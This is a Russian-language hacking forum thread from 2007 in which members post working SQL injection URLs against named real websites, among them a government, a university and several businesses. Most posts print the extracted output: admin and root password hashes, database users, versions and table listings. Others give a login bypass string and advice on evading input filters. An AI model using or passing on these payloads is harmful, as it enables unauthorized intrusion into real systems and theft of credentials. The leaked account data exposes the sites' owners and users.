SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    old.lipstick.ru
    Сначало логинимся лоин и пасс 'Or 1=1/*
    ПОтом идём сюда
    Code:
    http://old.lipstick.ru/smscenter.php?view=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a, password),6,7+FROM+users+LIMIT+0,1/*
    admin:399a2ece6b34ff6e314d87301af489f0
    Версия 4

    В админку не попасть, проблема с хэдэрами :mad:
     
    1 person likes this.
  2. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    Code:
    http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
    Чего-то дальше не крутится...(
     
    1 person likes this.
  3. 4Dfx

    4Dfx Banned

    Joined:
    6 Dec 2007
    Messages:
    12
    Likes Received:
    10
    Reputations:
    0
    Там фильтруются входящие данные пробуй AES_DECRYPT AES_ENCRYPT http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),15/*
     
  4. v1ru$

    v1ru$ Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    272
    Likes Received:
    196
    Reputations:
    17
    Code:
    http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71)+from+mysql.user/*
    
    root:*DE342DA364B639606FF4447B24338C1318FB181C:pseudo
     
    1 person likes this.
  5. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    Code:
    http://www.bmeia.gv.at/robots.txt
    админка:_https://cms.bmeia.gv.at/truman/index.php3
    логин/пароль не катят...
     
  6. v1ru$

    v1ru$ Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    272
    Likes Received:
    196
    Reputations:
    17
    так это пасс к БД)
     
  7. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    Да я в курсе...) Решил на авось попробовать, не прокатило...
     
  8. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.aziendeinvista.it/

    Code:
    http://www.aziendeinvista.it/view_news.asp?id=-1+union+select+1,concat_ws(0x3a,Passw,Admin),3,4,5,6,7+from+admin--
    http://www.tissuper.com.au/

    Code:
    http://www.tissuper.com.au/newsline/view_news.asp?id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admin_user)--
     
    #4068 Ded MustD!e, 15 Dec 2007
    Last edited: 15 Dec 2007
  9. Tyc00n

    Tyc00n Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www2.umaine.edu/graduate/article.php?id=-999'+union+select+1,version(),user(),4/*
    version() - 4.1.20

    user() - jwef@localhost
     
  10. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    www.avem.fr
    Code:
    http://www.avem.fr/news?id=-0303+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
    4.0.25-standard-log:[email protected]:avemlfod
     
  11. Saint-Sky

    Saint-Sky Elder - Старейшина

    Joined:
    14 Jul 2007
    Messages:
    119
    Likes Received:
    77
    Reputations:
    27
    2 Tyc00n

    Попробуй этот запрос:
    Code:
    http://www2.umaine.edu/graduate/article.php?id=-999'+UNION+SELECT+1,concat(username,0x3a,password),3,4+from+users+limit+0,1/*
     
    2 people like this.
  12. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Code:
    http://www.neurope.eu/view_news.php?id=-1+union+select+1,USER(),VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,DATABASE(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/*
    neweuro_kostas@localhost
    4.1.22-standard
    neweuro_corporate
     
  13. Saint-Sky

    Saint-Sky Elder - Старейшина

    Joined:
    14 Jul 2007
    Messages:
    119
    Likes Received:
    77
    Reputations:
    27
    Code:
    http://wap.freesoft.ru/get_file.wap.wml?id=99999'+UNION+SELECT+1,2,3,4,5/*
    get@localhost:get:4.1.14
     
    2 people like this.
  14. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.starww.com/

    Code:
    http://www.starww.com/view_news.asp?id=1+or+1=(SELECT+TOP+1+cast(Email+as+nvarchar)%2B%27%3A%27%2Bcast(UserPass+as+nvarchar)+from+AccountMaster)--
     
  15. Saint-Sky

    Saint-Sky Elder - Старейшина

    Joined:
    14 Jul 2007
    Messages:
    119
    Likes Received:
    77
    Reputations:
    27
    atlas.cz

    Не знаю - было или нет... Доступ из нужных - только к Zabava

    Code:
    http://wap.atlas.cz/tv.asp?id=-99+UNION+SELECT+name,2+from+master..sysdatabases--
     
    #4075 Saint-Sky, 16 Dec 2007
    Last edited: 16 Dec 2007
    1 person likes this.
  16. 4Dfx

    4Dfx Banned

    Joined:
    6 Dec 2007
    Messages:
    12
    Likes Received:
    10
    Reputations:
    0
    http://www.reusablebags.com/facts.php?id=-1+union+select+1,2,version(),user(),5,6,7/*
     
  17. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.athletesadvance.com/

    Code:
    http://www.athletesadvance.com/sample_profile.asp?view_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins+where+admin_id=1)--
     
    2 people like this.
  18. 4Dfx

    4Dfx Banned

    Joined:
    6 Dec 2007
    Messages:
    12
    Likes Received:
    10
    Reputations:
    0
    http://www.sufficiencyeconomy.org/show.php?Id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15+from+information_schema.tables/* Далее пользуемся лимитом P.S. Интересные таблички - useradmin, member, PROFILING
     
    1 person likes this.
  19. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    HTML:
    http://www.salienagolf.lv/?pane=nxt&lang=1&gid=22&n=1+union+select+0,convert(concat(USER(),VERSION(),DATABASE())+using+latin1),2,3,4,5,6,7,8,9,10,11,12/*
    USER:salienagolfcom@localhost
    VERSION:4.1.18
    DATABASE:salienagolfcom
     
    2 people like this.
  20. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    http://www.fllandforsale.biz/email_rep.php?id=4/*'
    http://www.fllandforsale.biz/email_rep.php?id=4+and+1=1/*'

    http://www.fllandforsale.biz/email_rep.php?id=4+order+by+22/*'

    http://fllandforsale.biz/searchRegions.php?pType=3/*
    http://fllandforsale.biz/searchRegions.php?pType=3+and+1=1/*
    http://fllandforsale.biz/searchRegions.php?pType=3+order+by+1/*


    http://fllandforsale.biz/showListing.php?type=property&id=348+and+1/*
    http://fllandforsale.biz/showListing.php?type=property&id=348+order+by+4/*

    http://www.fllandforsale.biz/email_rep.php?id=-4+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,0,11,12,13,14,15,16,17,18,19,20,21,22
    4.1.20::h7t6Y54@localhost::flland

    p.s. версия 4-ка и легким брутом таблици не подобрал, читать тоже прав нет

    http://www.epdlp.com/clasica.php?id=397+and+1=1/*'
    http://www.epdlp.com/clasica.php?id=397+order+by+14/*'
    http://www.epdlp.com/clasica.php?id=397+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*'

    http://www.epdlp.com/clasica.php?id=397+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14/*'
    5.0.45::[email protected]::epdlp



    http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=''+limit+100,11/*'

    clasica::top100
    clasica::eek:bra
    clasica::nommusico
    clasica::apemusico
    clasica::fecha

    http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name='clasica'+limit+1,4/*'

    texto::apeautor
    http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_schema,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+column_name+like+'%mail%'+limit+1,2/*'
    http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_schema,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name='felicitaciones'/*'

    felicitaciones
    epdlp::felicitaciones::comentario
    epdlp::felicitaciones::ID
    epdlp::felicitaciones::anio
    epdlp::felicitaciones::mes
    epdlp::felicitaciones::fecha
    epdlp::felicitaciones::dia
    epdlp::felicitaciones::hora
    epdlp::felicitaciones::email
    epdlp::felicitaciones::contenido

    p.s. версия 5-ка таблиц много можете поискать что-то)) /*прав читать файлы нет =\*/
     
    _________________________
    3 people like this.
Thread Status:
Not open for further replies.